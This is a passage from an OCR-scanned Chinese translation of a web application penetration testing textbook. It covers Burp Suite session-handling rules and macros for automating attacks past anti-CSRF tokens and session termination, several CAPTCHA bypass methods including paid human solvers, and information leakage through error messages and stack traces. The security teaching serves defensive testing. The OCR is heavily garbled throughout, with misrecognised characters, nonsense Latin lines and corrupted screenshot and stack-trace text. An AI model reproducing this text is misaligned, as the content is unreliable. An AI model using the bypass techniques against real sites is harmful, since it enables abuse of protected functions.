Burp Repeater 工 具 。 这 个 工具 允许 手动 修改 请 求 ， 然 后 多 次 重新 发 
ABIX PIB AK, DAWU TEU FARE Ae SU AAS Te] Ce fay > PRE 
过 滤 的 方法 或 者 实施 具体 的 攻击 。 


14.6 实 BH 


本 章 目 前 介绍 的 各 种 技巧 在 许多 应 用 程序 中 都 可 以 使 用 ， 而 不 会 
出 现任 何 问 题 。 但 是 ， 在 其 他 情况 下 ， 可 能 存在 各 种 导致 无 法 实施 定 
制 自动 化 攻击 的 障碍 。 

通常 ， 实 施 目 动 化 的 限制 主要 分 为 以 下 两 类 。 

口 会 话 处 理 机 制 ， 这 类 机 制 会 防御 性 地 终止 啊 应 意外 请 求 的 会 
话 ， 采 用 因 请 求 而 异 的 反 CSRF 令 牌 之 类 的 临时 参数 值 (请 参阅 第 13 章 
了 解 相关 内 容 ) ， 或 涉及 多 阶段 过 程 。 

口 CAPTCHA 探 件 ， 这 类 控件 旨 在 阻止 和 目 动工 具 访问 特定 应 用 程 
序 功能 ， 如 注册 新 用 户 账户 的 功能 。 

我 们 将 讨论 以 上 每 一 种 情形 ， 并 介绍 通过 优化 自动 工具 或 查找 应 
用 程序 的 防御 缺陷 ， 从 而 突破 实施 自动 化 的 限制 的 方法 。 


14.6.1 会 话 处 理 机 制 


许多 应 用 程序 采用 会 话 处 理 机 制 和 其 他 有 状态 功能 来 防止 目 动 测 
试 。 以 下 是 一 些 可 能 会 形成 限制 的 情形 。 

口 测试 请 求 时 ， 应 用 程序 会 出 于 防御 或 其 他 目的 ， 终 止 用 于 测试 
的 会 话 ， 琵 下 的 测试 也 随 之 失效 。 

口 某 个 应 用 程序 功能 使 用 必须 随 每 个 请 求 提 供 的 不 断 变化 的 令 牌 
〈 例 如 ， 为 防止 请 求 伪造 攻击 ) 。 
口 所 测试 的 请 求 在 多 阶段 过 程 中 显示 。 只 有 在 首先 提出 一 系列 其 
他 请 求 ， 应 用 程序 进入 适当 的 状态 时 ， 该 请 求 才 会 得 到 正确 处 理 。 

基本 上 ， 通 过 针对 应 用 程序 使 用 的 各 种 机 制 来 优化 自动 化 技巧 ， 
通常 可 以 突破 这 类 妨碍 。 如 果 在 JAttack 代 人 码 中 写 入 自己 的 测试 代码 ， 
束 可 以 直接 突破 特定 的 会 话 处 理 或 多 阶段 机 制 。 但 是 ， 这 种 方法 可 能 
较为 复杂 ， 并 且 不 能 有 效 地 移植 到 大 型 应 用 程序 中 。 实 际 上 ， 如 采 在 
处 理 每 一 个 新 问题 时 都 需要 编写 新 的 定制 代码 ， 这 本 吴 就 是 实施 上 自动 
化 的 一 大 限制 ， 这 种 方法 甚至 不 如 较 慢 的 手动 技巧 。 

Burp Suite 的 会 话 处 理 支 持 

324, Burp Suite 提 供 了 一 系列 功能 ， 可 用 于 尽 可 能 轻松 地 处 理 所 
有 这 些 情形 ， 以 便于 渗透 测试 员 继续 进行 测试 ， 而 由 Burp 在 后 台 无 缝 
处 理 各 种 限制 。 这 些 功 能 基于 以 下 组 件 : 


Hp 


J cookie/#; 

口 请 求 宏 ; 

口 会 话 处 理 规则 。 

我 们 将 简要 介绍 如 何 组 合 使 用 这 些 功 能 来 克服 实施 目 动 化 的 G” 
制 |， 从 而 在 上 壕 各 种 情形 下 继续 进行 测试 。 有 关 详 细 的 帮助 信息 ， 请 
参阅 Burp Suite 的 在 线 文档 。 

@ cookie/# 

Burp Suite 维 护 目 己 的 cookie 库 ， 用 于 追踪 浏览 名 和 Burp 目 己 的 工 
具 使 用 的 应 用 程序 cookie。 渗 透 测 试 员 可 以 配置 Burp 目 动 更 新 cookie 库 
的 方式 ， 还 可 以 直接 查看 和 编辑 其 内 容 ， 如 图 14-10 所 示 。 


Cookie jar viewer 28 fos x 
domain name edit cookie 
uk BBC-UIC [c49c0d3220 cerez 
google.co.uk NID 44=aYLikmbonEC remove cookie 
mdsec.net Sessionid E 7FD31 ee rakes 


close 


114-10 Burp Suitecookie/# 


就 其 本 喘 而 言 ， 该 cookie 库 并 不 执行 任何 操作 ， 但 Burp 的 其 他 会 
话 处 理 文 持 组 件 需要 用 到 它 追 踪 的 关键 值 。 

@ 请 求 宏 

宏 是 预先 定义 的 一 个 或 多 个 请 求 。 宏 可 用 于 执行 各 种 会 话 相 关 的 
任务 ， 包 括 : 
ee a (如 用 户 的 主页 ， 以 检查 当前 会 话 是 否 仍 
WAX 
口 执行 登录 ， 以 获取 新 的 有 效 会 话 ; 
口 获取 令 牌 或 nonce， 以 在 其 他 请 求 中 用 作 参 数 ; 
口 在 多 阶段 过 程 中 扫 摘 请 求 或 对 其 进行 模糊 测试 时 ， 需 要 提前 执 
行 一 些 请求 ， 以 便于 应 用 程序 进入 将 接受 目标 请 求 的 状态 。 


使 用 浏览 妖 可 以 录制 宏 。 在 定义 宏 时 ，Burp 会 显示 Burp Proxy 的 
历史 记录 视图 ， 从 中 可 以 选择 定义 宏 所 需 的 请 求 。 这 时 可 以 选择 以 前 
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图 14-11 在 Burp Suite 中 录制 请 求 宏 


可 以 为 宏 中 的 每 个 项 目 配 置 以 下 设置 ， 如 图 14-12 所 示 : 


图 14-12 ”为 宏 项 目 配置 cookie 和 人 参数 处 理 方式 


口 是 否 应 将 cookie 库 中 的 cookie 添 加 到 请 求 中 ; 

口 是 否 应 将 在 响应 中 收 到 的 cookie 添 加 到 cookie 库 中 ; 

口 对 于 请 求 中 的 每 个 参数 ， 是 应 使 用 预 设 值 ， 还 是 使 用 宏 内 以 前 
的 啊 应 获取 的 值 。 

在 某 些 多 阶段 过 程 以 及 应 用 程序 大 量 使 用 反 CSRF 令 有 牌 的 情况 下 ， 
从 安 内 以 前 的 啊 应 获取 参数 值 的 功能 特别 有 用 。 在 定义 新 安 时 ，Burp 
会 通过 识别 某 些 参数 ， 尝 斌 上 自动 查找 任何 此 类 关系 ， 这 些 参数 的 值 可 
以 从 以 前 的 啊 应 中 (表单 字段 值 、 重 定 疝 目标 、 链 接 中 的 查询 字符 
E) 确定 。 

@ 会 话 处 理 规则 

用 于 定义 会 话 处 理 规则 的 工具 是 Burp Suite 的 主要 会 话 处 理 文 持 组 
件 ， 该 工具 使 用 cookie 库 和 请 求 宏 来 克服 实施 目 动 化 的 特定 限制 。 

每 个 规则 由 范围 (规则 的 应 用 范围 和 操作 (规则 执行 的 操作 ) 
组 成 。 对 于 Burp 提 出 的 每 个 出 站 请 求 ， 将 确定 哪些 定义 的 规则 在 请 求 
的 应 用 范围 内 ， 并 按 顺 序 执行 所 有 规则 的 操作 。 

每 个 规则 的 范围 可 以 基于 所 处 理 的 请 求 的 以 下 任何 或 全 部 特性 进 
行 定义 ， 如 图 14-13 所 示 : 


Use the configuration below to conic! which URLs thes ruie applies to 


© induce af URLs 


O use sute scope Hefinedin target tad} 


图 14-13 ”配置 会 话 处 理 规则 的 范围 


口 提出 请 求 的 Burp 工 具 ; 

口 请 求 的 URL; 

口 请 求 中 参数 的 名 称 。 

每 个 规则 可 以 执行 一 项 或 多 项 操作 ， 如 图 14-14 所 示 ， 包 括 : 


j 


Session handing mle editor 
3 ope 


图 14-14 配置 会 话 处 理 规则 的 操作 


g 从 会 话 处 理 cookie 库 中 添加 cookie; 
口 设 置 特定 的 cookie 或 参数 值 ; 
口 检查 当前 会 话 是 否 有 效 ， 并 根据 结果 执行 相应 的 子 操作 ，; 
口 运 行 宏 ; 
口 提示 用 户 在 浏 贤 器 中 执行 会 话 恢 复 。 
所 有 这 些 操作 都 可 以 进行 灵活 配置 ， 并 且 能 够 以 任意 方式 组 合 使 
用 ， 处 理 几 乎 全 部 会 话 处 理 机 制 。 利 用 运行 安 并 根据 结果 更 新 指定 
cookie 和 参数 值 的 功能 ， 渗 透 测试 员 可 以 在 注销 后 重新 登录 应 用 程 
序 。 利 用 指示 在 浏览 器 中 执行 会 话 恢 复 的 提示 ， 渗 透 测 试 员 可 以 处 理 
a a a a (将 在 
Base 

通过 使 用 不 同 范围 和 操作 创建 多 个 规则 ， 可 以 定义 一 系列 Burp 将 
应 用 于 不 同 URL 和 参数 的 行为 。 例 如 ， 已 知 某 应 用 程序 经 常 终止 啊 应 
意外 请 求 的 会 话 ， 并 且 大 量 使 用 一 个 _ csrftoken 反 CSREF 令 牌 。 如 果 要 
测试 该 应 用 程序 ， 可 以 定义 以 下 规则 ， 如 图 14-15 所 示 。 
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图 14-15 ”一 组 会 话 处 理 规则 ， 可 用 于 处 理应 用 程序 使 用 的 会 话 终止 机 制 和 反 CSRF 
She 


口 对 于 所 有 请 求 ， 从 Burp 的 cookie 库 中 添加 cookie。 

口 对 于 指 回 应 用 程序 的 域 的 请 求 ， 验 证 应 用 程序 的 当前 会 话 是 否 
仍 处 于 活动 状态 。 如 果 是 ， 则 运行 宏 重 狐 登 录 到 该 应 用 程序 ， 并 使 用 
生成 的 会 话 令 牌 更 新 cookie 库 。 

口 对 于 指 癌 包含 __csrftoken 参 数 的 应 用 程序 的 请 求 ， 首 先 运行 宏 
来 获取 有 将 的 _csrftoken 值 ， 然 后 在 提出 请 求 时 使 用 该 值 。 

要 将 Burp 的 会 话 处 理 功 能 应 用 于 实际 的 应 用 程序 ， 通 第 需要 进行 
复杂 的 配置 ， 并 且 易 于 出 错 。Burp 提 供 了 一 项 追踪 功能 ， 可 用 于 解决 
会 话 处 理 配 置 问题 。 此 功能 将 显示 Burp 对 某 个 请 求 应 用 会 话 处 理 规则 


所 执行 的 所 有 步骤 ， 以 便于 查看 Burp 到 底 如 何 更 新 和 提出 请 求 ， 并 确 
定 配置 是 否 按 预期 方式 运行 。 会 话 处 理 追踪 功能 如 图 14-16 所 示 。 
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taw | params | headers | hex ] 
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Host: wdsec. cet 

User-Agent: Porslin/5.0 (Bacintcsb: Intel Nac O3 X 10.5: ev:2.0.1) Geeko/20100101 Firestoxs4.0.: 
Accept: cext/htel, application/ raed xml, application/ zel: g0 eth 2qr0.6 

ACCEPU-LANGUAGE: so En; Q=0. 

accept- Encoding: & ip, datiare 
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图 14-16 ”Burp 的 会 话 处 理 追 踩 功能 ， 可 用 于 监控 和 调试 会 话 处 理 规则 


对 测试 目标 应 用 程序 所 需 的 规则 和 宏 进 行 配置 和 测试 后 ， 渗 透 测 
试 员 可 以 正常 继续 手动 和 目 动 测试 ， 束 好 像 测 试 限制 并 不 存在 一 样 。 


14.6.2 CAPTCHA 控 件 


CAPTCHA 控 件 用 于 防止 攻击 者 自动 使 用 某 些 应 用 程序 功能 
加 电子 邮件 帐户 和 发 表 博 客 文 章 之 美的 功能 通常 使 用 此 类 控件 ， 以 六 
少 垃圾 信息 。 


CAPTCHA 是 Completely Automated Public Turing test to tell 
Computers and Humans Apart (全 自动 区 分 人 类 和 计算 机 的 图 灵 测 试 ) 
的 缩写 。 通 常 ， 这 些 测试 采用 一 个 包含 外 形 扭曲 的 单词 的 拼图 ， 用 户 
必须 读 取 并 在 提交 表单 的 字段 中 输入 该 单词 。 此 类 拼图 还 包括 识别 特 
定 的 动物 或 植物 、 图 像 方 向 等 。 

对 人 类 而 言 ， 解 决 CAPTCHA 拼 图 相当 容易 ， 但 对 计算 机 而 言 却 
非常 困难 。 由 于 突破 这 些 控件 会 给 垃圾 邮件 发 送 者 带 来 经 济 利益 ， 
而 相关 机 构 不 断 增 加 CAPTCHA 拼 图 的 难度 ， 导 致 人 类 越 来 越 难以 读 
取 这 些 拼 图 ， 如 图 14-17 所 示 。 由 于 人 类 与 计算 机 解决 CAPTCHA 拼 图 
的 能 力 相当 ， 因 此 ， 作 为 针对 垃圾 邮件 的 一 项 防御 措施 ， 这 些 拼 图 可 
能 会 逐渐 失效 ， 并 可 能 会 被 上 废弃。 它们 还 会 造成 当前 并 未 完全 解决 的 
访问 性 问题 。 


Type tie characters you see in the picture below 


(nr 


图 14-17 “一 个 CAPTCHA 拼 图 


CAPTCHA 拼 图 可 以 通过 各 种 方式 进行 破解 ， 仪 一 部 分 拼图 适用 
于 执行 安全 测试 。 

1. 攻击 CAPTCHA 控 件 

要 了 解 如 何 避 开 CAPTCHA 控 件 ， 最 有 效 的 方法 是 了 解 此 类 拼图 
如 何 被 传送 至 用 户 ， 以 及 应 用 程序 如 何 处 理 用 户 的 答案 。 

令 人 惊奇 的 是 ， 有 大 量 CAPTCHA 控 件 以 文本 形式 向 用 户 披露 拼 
图 答案 。 披 露 答案 的 形式 包括 : 

口 拼图 图 像 通过 URL 加 载 ， 而 拼图 答案 却 为 该 URL 的 参数 ， 或 将 
图 像 名 设置 为 CAPTCHA 管 案 ; 

口 拼 图 答案 存储 在 隐藏 表单 字段 中 

口 拼 图 答案 出 现在 HITML 注 释 或 其 他 位 置 (用 于 调试 目的 ) 。 

在 这 些 情 况 下 ， 攻 击 者 可 以 通过 脚本 攻击 轻松 获取 包含 拼图 答案 
的 响应 ， 并 在 下 一 个 攻击 请 求 中 提交 该 答案 。 


尝试 访问 


http://mdsec.net/feedback/12/ 
http://mdsec.net/feedback/24/ 
http://mdsec.net/feedback/31/ 


CAPTCHA (FHT EE AET, MRA LEER 
动 解决 拼图 ， 然 后 在 多 个 请 求 中 重复 提交 其 答案 。 正 音 情 况 下 ， 每 个 
拼图 应 仅 用 一 次 ， 应 用 程序 应 在 收 到 提交 的 答案 后 废弃 该 拼图 。 如 采 
ANIM, BOT AEDES RGA, Me AE 
案 不 限 数量 地 目 动 提出 请 求 。 


尝试 访问 


http://mdsec.net/feedback/39/ 


于 注解 一 些 应 用 程序 有 意 提供 破解 CAPTCHA 的 代码 路 径 ， 


以 便于 某 些 授权 自动 进程 使 用 。 通 常 ， 在 这 些 情况 下 ， 无 须 提交 相 
关 参 数 名 束 可 以 避 开 CAPTCHA ° 


2. 自动 破解 CAPTCHA 拼 图 

理论 上 ， 计 算 机 可 以 破解 大 多 数 CAPTCHA 拼 图 ， 实 际 上 ， 许 多 
主流 拼图 算法 都 以 这 种 方式 被 破解 。 

对 于 包含 扭曲 单词 的 标准 拼图 ， 破 解 拼 图 的 过 程 如 下 : 

(1) 删除 图 像 噪声 

(2) 将 图 像 分 割 成 单个 字母 ; 

(3) 识别 每 个 部 分 包含 的 字母 。 

采用 最 新 技术 ， 计 算 机 能 够 相当 有 效 地 删除 图 像 噪声 ， 并 识别 已 
被 正确 分 割 的 字母 。 这 时 ， 将 图 像 分 割 成 字母 是 最 重要 的 挑战 ， 特 别 
ee FRESH FSSA FE 。 

对 于 可 以 轻松 分 割 成 字母 的 简单 拼图 ， 可 以 使 用 某 种 自行 编写 的 
代码 来 删除 图 像 噪声 ， 并 将 文本 传送 到 现 有 的 OCR (光学 文字 识别 ) 
库 中 来 进行 识别 。 对 于 非常 难以 分 割 的 复杂 拼图 ， 各 种 研究 项 目 已 经 
成 功 破解 了 一 些 知名 Web 应 用 程序 的 CAPTCHA 拼 图 。 

对 于 其 他 类 型 的 拼图 ， 则 需要 针对 拼图 图 像 的 特点 采用 不 同 的 方 
法 。 例 如 ， 对 于 要 求 识别 动物 或 物体 方向 的 拼图 ， 则 需要 使 用 实时 图 
像 数 据 库 ， 以 便于 在 多 个 拼图 中 重复 使 用 。 但 是 ， 如 果 这 个 数据 库 非 
常 小 ， 攻 击 者 就 可 以 通过 手动 破解 数据 库 中 的 拼图 来 达到 成 功 实施 攻 
击 的 目的 。 即 使 为 了 使 每 一 幅 重复 使 用 的 图 像 在 计算 机 看 来 会 有 所 不 
同 ， 应 用 程序 对 图 像 应 用 了 噪声 和 其 他 扭曲 ， 但 攻击 者 通常 会 采用 模 
糊 图 像 散 列 和 彩色 直方 图 比较 ， 将 给 定 拼图 中 的 图 像 与 已 手动 破解 的 
图 像 进行 匹配 。 


Microsoft 的 Asirra 拼 图 使 用 一 个 包含 数 百 万 幅 猫 和 狗 图 像 的 数据 
库 ， 这 些 图 像 来 自 现 实 世 界 中 可 领养 的 宠物 目录 。 我 们 在 下 一 太 将 讲 
到 ， 在 庞大 的 经 济 利益 的 刺激 下 ， 即 使 这 样 的 数据 库 也 可 能 会 被 攻击 
者 快速 破解 。 

值得 注意 的 是 ， 在 所 有 这 些 情况 下 ， 要 有 效 人 破解 CAPTCHA 控 
件 ， 攻 击 者 并 不 需要 完全 准确 地 破解 拼图 。 例 如 ， 即 使 某 个 攻击 仪 正 
确 破 解 了 10% 的 拼图 ， 但 该 攻击 仍然 能 够 非常 有 效 地 实施 自动 安全 测 
试 ， 或 传送 垃圾 邮件 ( 视 具体 情况 而 定 ) 。 通 常 ， 与 手动 攻击 相 比 ， 
动 攻击 需要 提交 十 倍 以 上 的 请 求 ， 后 者 实施 起 来 仍然 更 加 快捷 

0 轻松。 


尝试 访问 


http://mdsec.net/feedback/8/ 


3. 使 用 人 类 破解 者 

有 时 ， 需 要 破解 大 量 CAPTCHA 拼 图 的 犯罪 分 子 会 采用 一 些 并 不 
适用 于 执行 Web 应 用 程序 安全 测试 的 技巧 ， 如 下 所 示 。 

口 攻 击 者 可 以 使 用 某 个 貌似 善意 的 Web 站 点 诱 使 人 类 CAPTCHA 代 
理 破解 日 标 应 用 程序 传递 的 拼图 。 通 常 ， 攻 击 者 会 利用 竞赛 奖励 或 免 
费 访 问 色 情 内 容 来 吸引 用 户 。 用 户 填 写 注册 表单 后 ， 将 会 看 到 一 个 从 
目标 应 用 程序 实时 提取 的 CAPTCHA 拼 图 。 用 户 破解 该 拼图 后 ， 攻 击 
者 会 将 其 提供 的 答案 提交 给 日 标 应 用 程序 。 

口 攻 击 考 可 以 问 发 展 中 国家 的 人 类 CAPTCHA 工 蜂 支 付费 用 ， 由 
后 者 破解 大 量 拼 图 。 一 些 公 司 提供 这 种 服务 ， 每 破解 1000 个 拼图 付费 


不 到 1 美元 。 


14.7 ”人 小结 


攻击 一 个 Web 应 用 程序 所 需 执行 的 绝 大 多 数 任务 必须 根据 应 用 程 
序 的 行为 以 及 与 它 交 互 和 控制 它 的 方法 来 确定 。 为 此 需要 经 芝 进 行 手 
动 操 作 ， 分 别提 区 专 门 设计 的 请 求 并 审查 应 用 程序 对 这 些 请 求 的 啊 
Wy? 

Sica Et, BOT CEASE ee a BOTS SE Ae tl oe ET LFA A 
目 动 扩 巧 使 上 述 定 制 任务 更 加 轻松 、 快 捷 、 高 效 。 事 实 上， 渗透 测试 
员 可 以 对 想 要 执行 的 任何 手动 操作 目 动 化 : 使 用 计算 机 的 处 理 能 力 与 
可 靠 性 能 攻击 目标 程序 的 漏洞 与 弱点 。 

在 某 些 情况 下 ， 在 直接 应 用 目 动 化 技巧 时 ， 可 能 会 遇 到 各 种 障 
碍 。 但 是 ， 多 数 情况 下 ， 这 些 障碍 都 可 以 通过 优化 目 动 化 工具 或 查找 
应 用 程序 防御 机 制 中 的 缺陷 加 以 克服 。 

虽然 概念 上 非常 简单 ， 但 有 效 使 用 目 动 化 定制 攻击 仍然 需要 运用 
经 验 、 技 能 ， 并 发 挥 想象 。 有 各 种 工具 可 帮助 渗透 测试 员 实 施 攻 击 ， 
或 者 他 们 也 可 以 编写 目 己 的 工具 。 但 任何 工具 也 替代 不 了 人 类 的 智 
mek, AST SAY NI] ze AE ASR Web YH Be RA SS 
HIEKKA o SBA Ae SMA, REMA 
al 
IJE o 


14.8 ”问题 


欲 知 答案 ， 请 参考 http:/mdsec. net/wahh ° 
指出 使 用 目 动 技巧 在 应 用 程序 中 枚 举 标识 符 时 用 到 的 3 个 标 
TA “fi” ° 
(2) 对 于 下 面 的 每 一 类 漏洞 ， 指 出 一 个 可 用 于 确定 该 漏洞 的 模糊 
测试 字符 串 : 
(a) SQL 注入 
(b) OS 命令 注入 
(c) BRA 
(d) 脚本 文件 包含 
(3) 当 对 一 个 包含 各 种 不 同 参数 的 请 求 进行 模糊 测试 时 ， 为 何 要 
在 保持 其 他 参数 不 变 的 情况 下 轮流 针对 每 一 个 参数 进行 测试 ? 
(4) 假设 在 一 个 试图 对 登录 功能 实施 蛮 力 攻击 以 找到 其 他 账户 证 
书 的 上 自动 攻击 中 ， 无 论 提 交 的 是 有 效 证 书 还 是 无 效 证 书 ， 应 用 程序 都 
返回 一 个 指 癌 相同 URL 的 HTTP 重 定 癌 。 在 这 种 情况 下 ， 使 用 什么 方法 
探查 “ 触 点 ”最 为 可 靠 ? 
(5) 当 使 用 自动 攻击 从 应 用 程序 中 获取 数据 时 ， 想 要 的 信息 常常 
T 渗透 测试 员 可 以 轻易 截获 这 些 数 据 。 例 
H: 


<input type="text" name="LastName" value=" 


但 是 ， 在 其 他 情况 下 发 现 事 实 并 非 如 此 ， 需 要 的 信息 之 前 的 数据 
可 能 会 发 生变 化 。 这 时 该 如 何 设计 一 个 自动 攻击 来 满足 需要 ? 


第 4 章 介绍 了 可 用 于 解析 目标 应 用 程序 并 初步 了 解 其 运行 机 制 的 
各 种 技巧 ， 包 括 以 大 体 上 不 会 对 应 用 程序 造成 危害 的 方法 与 其 交互 ， 
将 应 用 程序 的 内 容 与 功能 进行 分 类， 判定 它 使 有 的 技术 并 了 珊 定 主 要 的 
T o 

本 章 介绍 如 何在 实际 攻击 的 应 用 程序 中 提取 出 更 多 信息 ， 主 要 包 
括 以 出 人 意料 和 恶意 的 方式 与 应 用 程序 进行 交互 ， 利 用 应 用 程序 的 反 
常 行为 提取 出 有 价值 的 信息 。 如 果 取 得 成 功 ， 攻 击 者 就 可 以 通过 这 种 
攻击 获取 用 户 证 书 之 类 的 敏感 数据 ， 深 入 了 解 某 种 错误 条 件 并 据 此 调 
整 攻 击 方向 ， 或 者 发 现 应 用 程序 所 使 用 技术 的 更 多 细节 ， 同 时 解析 应 
用 程序 的 内 部 结构 与 功能 。 


15.1 错误 消息 


发 生意 外 事件 时 ， 许 多 Web 应 用 程序 返回 详尽 的 错误 消息 。 从 仅 
仅 披 露 销 误 类 型 的 简单 内 置 消息 到 泄露 许多 应 用 程序 状态 细节 的 详细 
调试 信息 都 涵盖 在 错误 消息 中 。 

在 部 署 之 前 ， 大 多 数 应 用 程序 都 接受 了 各 种 可 用 性 测试 。 通 常 ， 
这 种 测试 能 够 发 现在 正常 使 用 应 用 程序 过 程 中 出 现 的 大 部 分 错误 条 
件 。 因 此 ， 一 般 情况 下 ， 应 用 程序 会 对 这 些 条 件 进 行 合理 地 处 理 ， 而 
不 会 向 用 户 返回 任何 技术 消息 。 但 是 ， 如 果 应 用 程序 正在 遭受 攻击 ， 
很 可 能 就 会 出 现 各 种 各 样 的 错误 条 件 ， 导 致 应 用 程序 辐 用 户 返 回 更 加 
详细 的 信息 。 如 果 出 现 极 不 平常 的 错误 条 件 ， 即 使 是 最 注重 安全 的 应 
用 程序 (如 电子 银行 使 用 的 应 用 程序 ， 也 会 向 用 户 返回 非常 详细 的 
调试 消息 。 
15.1.1 错误 消息 脚本 

如 果 在 解释 型 Web 脚 本 语言 (如 VBScript) 中 出 现 错 误 ， 应 用 程 
序 通 销 会 返回 一 条 简单 的 销 误 消 息 ， 以 揭示 错误 的 本 质 ， 并 且 还 可 能 
会 有 发 生 错 误 的 文件 的 行 号 。 例 如 : 


Microsoft VBScript runtime error 800a0009 


Subscript out of range: [number -1] 
/register.asp, line 821 


这 种 消息 中 并 不 包含 任何 与 应 用 程序 状态 或 被 处 理 的 数据 有 关 的 
敏感 信息 。 但 是 ， 渗 透 测试 员 可 以 利用 它 从 各 方面 缩小 攻击 范围 。 例 
如 ， 当 为 探查 常见 的 漏洞 在 一 个 特殊 的 参数 中 插入 各 种 攻击 字符 串 
IY, ARES IASI LA PA: 

Microsoft VBScript runtime error '800a000d' 
Type mismatch: ' [string: "'"]' 
/scripts/confirmOrder.asp, line 715 

RA Bath, BUN BUS [TE SL, fe, HF 

提交 的 输入 中 包含 非 数 字 字 符 ， 因 而 不 能 赋 给 上 述 参 数 。 在 这 种 情况 


下 ， 向 这 个 参数 提供 非 数 子 攻 击 字 符 串 可 能 达 不 到 任何 目的 ， 也 不 会 
发 现 各 种 类 型 的 漏洞 ， 因 此 ， 最 好 选择 其 他 的 参数 。 

此 外 ， 这 种 类 型 的 错误 消息 还 有 助 于 更 好 地 理解 服务 大 端 应 用 程 
序 的 逻辑 。 因 为 消息 披露 了 发 生 错误 的 行 号 ， 所 以 能 够 确定 两 个 不 同 
的 畸形 请 求 是 触发 同一 个 错误 ， 还 是 不 同 的 错误 。 通 过 在 几 个 参数 中 
是 交 不 恨 的 输入 并 确认 错误 发 生 的 位 置 ， 还 可 以 确定 应 用 程序 处 理 不 
同 参 数 的 顺序 。 系 统 性 地 修改 不 同 的 参数 ， 渗 透 测 试 员 束 可 以 解析 出 
服务 器 执行 的 各 种 代码 路 径 。 


15.1.2” 栈 追踪 


大 多 数 Web 应 用 程序 用 比 简 单 脚本 更 复杂 、 但 仍然 在 一 种 托管 执 
行 环 境 (managed execution environment) 下 运行 的 语言 编写 ， 例 如 ， 
Java、C# 和 Visual Basic. NET。 如 果 这 些 语言 中 出 现 无 法 处 理 的 错误 ， 
浏 质 辟 往 往 会 显示 完整 的 栈 妃 踩 。 

栈 追 踩 是 一 种 结构 化 的 错误 消 筷 。 它 首先 说 明 具 体 的 钳 误 ， 接 着 
在 后 面 的 许多 行 中 描述 错误 发 生 时 调用 栈 的 执行 状态 。 调 用 栈 的 首 行 
显示 生成 错误 的 函数 ， 第 二 行 显示 调用 前 一 个 函数 的 函数 ， 以 此 类 
推 ， 直 到 显示 所 有 被 调用 的 函数 。 


下 面 是 一 个 由 ASPNET 应 用 程序 生成 的 栈 追 踪 : 
([HttpException (0x80004005): Cannot use a leading .. to exit above the 


top directory. ] 
System.Web.Util.UrlPath.Reduce(String path) +701 


System ng relativ 9 
System.Web.UI.Control 14 
PBSArp.StatPunc.tieb.MemberAy ePage.Redirect (String url) +130 
PBSApp. StatPunc.Web.MemberAy age.Process{} +201 
PBSApp. StatPunc.wtWeb.MemberAy ePage.OnLoad (EventArgs è) 
System.Web.UI.Control.LoadRecursive(} +3 
System.Web.UI. Page.ProcessRequestMain{) +750 
Version Information: Microsoft .NET Framework Version:1.1.4322.2300; 
ASP.NET Version:1.1.4322.2300¢ 


这 种 错误 消 轧 提供 大 量 有 用 的 信息 ， 可 帮助 攻击 者 优化 针对 应 用 
程序 的 攻击 。 

口 通常 ， 它 会 说 明 错 误 发 生 的 准确 原因 。 攻 击 者 可 以 根据 这 些 信 
轧 调 整 输入 内 容 ， 避 开 错 误 条 件 ， 从 而 继续 实施 攻击 。 


口 调 用 栈 经 营 会 引用 应 用 程序 使 用 的 大 量 库 和 第 三 方 代码 组 件 。 
可 以 查阅 这 些 组 件 的 文档 资料 ， 了 解 它们 的 预期 行为 与 假设 。 还 可 以 
创建 这 些 组 件 的 本 地 应 用 ， 并 对 它 进 行 测 试 ， 了 解 应 用 程序 如 何 处 理 
出 人 意料 的 输入 ， 并 确定 潜在 的 漏洞 。 

口 调 用 栈 中 包含 用 于 处 理 请 求 的 所 有 权 代 码 组 件 的 名 称 。 了 解 这 
些 组 件 的 命名 方案 及 其 相 与 关系 夺 助 于 推断 应 用 程序 的 内 部 结构 与 功 


能 
口 栈 追踪 中 通常 包含 行 号 。 和 前 面 描述 的 简单 错误 消息 脚本 一 
样 ， 可 以 利用 这 些 行 号 探查 并 理解 每 个 应 用 程序 组 件 的 内 部 逻辑 。 
口 错 误 消 息 中 常常 包含 与 应 用 程序 及 其 运行 环境 有 关 的 其 他 信 
息 。 在 前 面 的 示例 中 ， 可 以 确定 应 用 程序 所 使 用 的 ASP.NET 平台 的 版 
本 ， 因 此 就 可 以 研究 这 个 平台 ， 查 找 任何 已 知 或 新 出 现 的 漏洞 、 反 常 
行为 、 常 见 的 配置 错误 等 。 


15.1.3 详尽 的 调试 消息 


一 些 应 用 程序 生成 目 定 义 的 错误 消 忌 ， 其 中 包含 大 量 的 调试 信 
在 开发 与 测试 阶段 ， 这 些 消 轧 有 助 于 开发 者 对 应 用 程序 进行 调 
试 ， 其 中 常常 包含 大 量 与 应 用 程序 运行 状态 有 关 的 信息 。 例 如 


wee SESS ION eos 


iSagor2n2pw3gp55ipszsb55 
SessionUser.Sessions App.FEStructure.Sessions 
essionUser.Auth 1 
essionUser.BranchiID 193 
ssionUser.CompanylID 76 
SessionUser.BrokerRef RRadv0 
SessionUser.UseriD 229 
SessionUser.Training 0 
SessilonUser.NetworkID 11 
Sessionuser.BrandingPath FE 
LoginURL /Default/fedefault.aspx 
ReturnuRL ../default/fedefault.aspx 
SessionUser.xey f7e50aef8fadd30Ff3i f3aeall4cef26edz2ce2beS50073¢ 
SessionClient.ID 306 
SessionClient.ReviewlD 245 
UPriv.2100 
SessionUser.NetworkLevelUser 0 
UPriv.2200 
SessionUser.BranchLevelUser 0 
SessionDatabase £d219.prod.wahh-bank.com 
详尽 的 调试 消息 中 通常 包含 以 下 信息 。 
口 可 通过 用 户 输 入 操纵 的 关键 会 话 变 量 值 。 
口 数据 库 等 后 端 组 件 的 主机 名 称 与 证 书 。 
OARS ae PACE ARK © 
口 召 入 在 有 意义 的 会 话 令 牌 中 的 信息 〈 请 参阅 第 7 章 了 解 相关 内 
口 用 于 保护 通过 客户 端 传送 的 数据 的 加 密 密 钥 〈 请 参阅 第 5 章 了 解 
相关 内 容 ) 。 

口 在 本 地 代码 组 件 中 出 现 的 异常 调试 信息 ， 包 括 CPU 寄 存 妖 的 
值 、 栈 的 内 容 、 加 载 的 DLL 列表 及 其 基本 地 址 (请 参阅 第 16 章 了 解 相 
KAR) 。 

如 果 在 实际 的 生产 代码 中 出 现 这 种 泄露 功能 的 错误 ， 那 么 应 用 程 
序 就 存在 严重 的 安全 缺陷 。 渗 透 测试 员 应 该 对 它 进行 仔细 检查 ， 确 定 
任何 可 用 于 扩大 攻击 范围 的 数据 ， 并 且 可 以 通过 提交 专门 设计 的 输入 
操纵 应 用 程序 的 状态 ， 控 制 其 获取 信息 的 情况 。 


容 ) 


